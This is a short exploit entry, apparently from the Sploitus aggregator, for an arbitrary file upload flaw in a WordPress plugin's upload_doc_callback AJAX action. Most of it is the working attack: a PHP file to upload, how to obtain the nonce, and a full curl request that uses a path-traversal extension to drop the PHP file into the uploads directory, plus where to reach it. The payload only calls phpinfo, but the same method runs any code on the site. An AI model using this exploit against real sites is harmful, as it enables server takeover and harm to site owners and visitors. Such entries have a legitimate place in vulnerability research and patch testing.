## https://sploitus.com/exploit?id=WPEX-ID:67F3948E-27D4-47A8-8572-616143B9CF43
1) Create a file named exploit.php, which contains: <?php phpinfo();
2) Find the upf_ajax_nonce on the site's front page.
2) Run the following cURL request,
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -b 'YOUR COOKIES' -F 'docfile=@exploit.php' -F 'docext=/../../exploit.php' -F 'doc_type=doc/pdf' -F 'action=upload_doc_callback' -F 'upf_nonce=YOUR NONCE'
# You can find the uploaded PHP file at: https://target/blog/wp-content/uploads/exploit.php